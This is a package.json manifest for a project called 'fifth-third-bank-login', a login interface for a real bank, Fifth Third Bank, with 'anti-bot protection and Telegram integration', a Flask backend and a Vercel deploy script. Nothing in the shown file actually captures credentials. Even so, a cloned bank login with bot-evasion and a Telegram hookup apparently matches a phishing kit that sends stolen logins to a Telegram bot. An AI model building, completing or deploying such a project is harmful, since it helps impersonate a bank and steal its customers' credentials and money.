{
  "name": "fifth-third-bank-login",
  "version": "1.0.0",
  "description": "Fifth Third Bank login interface with anti-bot protection and Telegram integration",
  "main": "index.html",
  "scripts": {
    "start": "python -m http.server 8080",
    "dev": "python backend.py",
    "build": "echo 'No build step required for static files'",
    "deploy": "vercel --prod"
  },
  "keywords": [
    "banking",
    "login",
    "security",
    "anti-bot",
    "telegram",
    "flask",
    "html",
    "css",
    "javascript"
  ],
  "author": "Your Name",
  "license": "MIT",
  "repository": {
    "type": "git",
    "url": "https://github.com/yourusername/fifth-third-bank-login.git"
  },
  "engines": {
    "node": ">=14.0.0"
  },
  "dependencies": {},
  "devDependencies": {}
} 